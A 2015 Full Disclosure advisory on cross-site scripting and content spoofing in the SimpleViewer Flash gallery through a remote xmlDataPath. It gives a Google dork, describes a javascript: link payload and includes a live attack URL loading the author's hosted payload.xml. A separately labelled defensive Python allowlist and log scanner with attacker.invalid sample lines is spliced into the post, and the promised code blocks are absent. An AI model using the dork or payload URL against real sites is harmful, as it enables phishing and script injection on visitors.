######################################################################################################## Cross Site Scripting (XSS) & Content spoofing in SimpleViewer all versions via remote xml payload [2015] ########################################################################################################
EAT, SLEEP, HACK, REPEAT, EAT, SLEEP, HACK, REPEAT, EAT, SLEEP, HACK, REPEAT, EAT, SLEEP, HACK, REPEAT
########################################################################################################

Vendor: http://www.simpleviewer.net/simpleviewer/
Vulnerable application: simpleviewer.swf
Vulnerability: Execution of JavaScript and content spoofing
Version: All versions seem vulnerable with modified payloads
Dork: filetype:swf intext:SimpleViewer
Credits: @APT1337, @kelodymelody

SimpleViewer is a free image gallery viewer which comes as a SWF Flash script that loads a gallery of images from a local gallery.xml file. SimpleViewer is used on hundreds of thousands of web servers by a range of different users, from bloggers all the way to government.

After receiving no feedback from the developers of SimpleViewer in regards to this vulnerability, and attempting to reach out to numerous affected customers of SimpleViewer, again with no feedback, I feel the need to disclose this vulnerability in full, publicly, so that people can remove SimpleViewer from their websites. I did try to warn you... @NASA, @NYCOURTS, @IEEE, @MIT, @ACM.
SimpleViewer is able to load the gallery.xml file in a number of different ways:

http://www.example.com/viewer.swf
The above example loads gallery.xml locally from the server.

http://www.example.com/viewer.swf?xmlDataPath=gallery.xml
The above example loads gallery.xml, or another .xml file, defined using the xmlDataPath variable.

http://www.example.com/viewer.swf?xmlDataPath=http://www.example2.com/gallery.xml
The above example loads a remote gallery.xml file, provided the remote server has a cross-domain policy. This can allow an attacker to include remote malicious XML files in the SimpleViewer application.

SimpleViewer does not check that the gallery.xml file being loaded is stored locally within the same domain, nor that it is being loaded from a known/safe remote location. SimpleViewer can be forced to load remote malicious galleries provided that the server hosting the remote gallery has a cross-domain policy file (crossdomain.xml). This means that an attacker can load a remote malicious XML file into SimpleViewer, which allows the attacker both to spoof content and to execute JavaScript within the context of the user's browser. This can be used to trick users into logging in to a fake login page to steal login information, or into downloading malicious files.

Before we can exploit this vulnerability in SimpleViewer we must first create a cross-domain policy file (crossdomain.xml) which allows SimpleViewer to fetch the payload from our server. The crossdomain.xml file would consist of the following code:

The above crossdomain.xml file should be placed in the webroot of the remote server where the remote gallery.xml file is located.

SimpleViewer allows the user to customize their gallery using a number of different variables which are set within the gallery.xml file. Below is a small list of variables that can be used within the gallery.xml file:

title - Text to display as gallery title.
imagePath - Relative or absolute path to images folder.
thumbPath - Relative or absolute path to thumbnail images folder.
backgroundImagePath - Relative or absolute path to a JPG or SWF to load as the gallery background.

An example of one of these gallery.xml files, provided as a demo, can be found on simpleviewer.net at the following URL:

Gallery: http://www.simpleviewer.net/simpleviewer/examples/modern/gallery.xml

---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---

As you can see from the demo gallery.xml file, there are a number of variables which we can use to spoof content and images on the server, such as imagePath, thumbPath and title. We can also trick users into executing JavaScript by including JavaScript within an HTML anchor element whose link text reads "CLICK FOR PoC".

The above example will show "CLICK FOR PoC" as a clickable link which executes a JavaScript alert box once the user clicks on the link. More of these variables are listed at the following URL: http://simpleviewer.net/simpleviewer/pro/support/v1_9/actionscript_options.html

Using the above information an attacker can create carefully crafted payloads to spoof content via images and execute JavaScript within the context of the user's browser. Below I have created an example payload as proof of concept, which has been tested against SimpleViewer v1.9. The proof-of-concept payload references an image (image.jpg) and the "CLICK FOR PoC" link described above.

Other versions of SimpleViewer are vulnerable to this same type of attack but require a slightly modified payload. Other, more recent versions of SimpleViewer add more features which an attacker can use to spoof content and perform other types of attacks. Version 1.9 was chosen as an example as it seems to be the most common version found installed on servers searchable by Google.
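Added defensive example, not part of the original advisory and not SimpleViewer's own code: a Python script that implements the origin check the advisory says the viewer lacks (accept only a relative path, the site's own host, or an explicitly allowlisted gallery host) and then runs that same classifier over web-server access-log lines to find past requests that pulled a gallery definition from an untrusted host. It assumes the viewer is served from www.example.com, a constructed allowlist containing cdn.example.com, and logs in Apache/nginx combined format; the log lines and the attacker.invalid hostname are constructed for the demo.

```python
"""Defensive checks for SimpleViewer's xmlDataPath parameter (added example,
not SimpleViewer's own code).

classify_xml_data_path() implements the check the advisory says the viewer
lacks: a gallery definition is accepted only when it is a relative path, a URL
on the site's own host, or a URL on an explicitly allowlisted host.
scan_access_log() runs the same classifier over web-server access-log lines
(combined log format) to find past requests that pulled a gallery from an
untrusted host. Hostnames and log lines below are constructed for the demo.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

SITE_HOST = "www.example.com"               # host serving viewer.swf (assumed)
ALLOWED_REMOTE_HOSTS = {"cdn.example.com"}  # constructed allowlist of gallery hosts


def classify_xml_data_path(value, site_host=SITE_HOST, allowed=ALLOWED_REMOTE_HOSTS):
    """Classify an xmlDataPath value as 'local', 'allowed-remote' or 'untrusted-remote'.

    Percent-decoding first means an encoded 'http%3A%2F%2F...' is judged the
    same way as the plain form the viewer would eventually resolve.
    """
    parts = urlsplit(unquote(value).strip())
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    # No scheme and no authority: a plain relative path such as 'gallery.xml'
    # or 'galleries/2015.xml', resolved against the viewer's own URL.
    # Protocol-relative forms ('//host/x.xml') carry an authority, so they do
    # not take this branch and are judged by host below.
    if not scheme and not parts.netloc:
        return "local"
    if scheme in ("http", "https") and host == site_host.lower():
        return "local"
    if scheme in ("http", "https") and host in allowed:
        return "allowed-remote"
    return "untrusted-remote"


# Combined log format: client, identity, user, [timestamp], "request", status, size, ...
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (client, target, xmlDataPath value) for requests that loaded a .swf
    with an xmlDataPath pointing at an untrusted host."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not combined-format requests
        target = m.group("target")
        req = urlsplit(target)
        if not req.path.lower().endswith(".swf"):
            continue  # only the Flash viewer consumes this parameter
        # Compare the parameter name case-insensitively so a differently cased
        # key is still reviewed; that errs on the side of more findings.
        for key, values in parse_qs(req.query, keep_blank_values=True).items():
            if key.lower() != "xmldatapath":
                continue
            for value in values:
                if classify_xml_data_path(value) == "untrusted-remote":
                    findings.append((m.group("client"), target, value))
    return findings


# Constructed sample log lines (RFC 5737 addresses and a .invalid host, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2015:12:00:01 +0000] "GET /gallery/viewer.swf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2015:12:00:02 +0000] "GET /gallery/viewer.swf?xmlDataPath=gallery.xml HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2015:12:00:03 +0000] "GET /gallery/viewer.swf?xmlDataPath=http%3A%2F%2Fattacker.invalid%2Fpayload.xml HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2015:12:00:04 +0000] "GET /gallery/viewer.swf?xmlDataPath=http://cdn.example.com/g.xml HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2015:12:00:05 +0000] "GET /gallery/viewer.swf?xmlDataPath=//attacker.invalid/payload.xml HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2015:12:00:06 +0000] "GET /index.php?xmlDataPath=http://attacker.invalid/x.xml HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, target, value in scan_access_log(SAMPLE_LOG):
        print(f"{client} loaded an untrusted gallery: {value}  ({target})")
```

The SWF itself cannot be patched from outside, so the classifier is meant for a guard in front of the viewer (a web-server rule or a small proxy that rejects any xmlDataPath that does not classify as local or allowed-remote) while the viewer is being removed, which is what the advisory itself recommends. The log scan answers the incident-response question of whether a remote gallery was ever loaded on the site; a hit means a visitor's browser may have rendered attacker-controlled content and links.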
I have uploaded a working version of this payload to my server so that people can test whether they are vulnerable to this type of attack. This payload can be found at the following URL:

Payload: http://rm-rf.ninja/payload.xml
Attack: http://www.example.com/viewer.swf?xmlDataPath=http://rm-rf.ninja/payload.xml

Shouts to @hxmonsegur and all the other researchers out there keeping it real hunting them 0day!

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/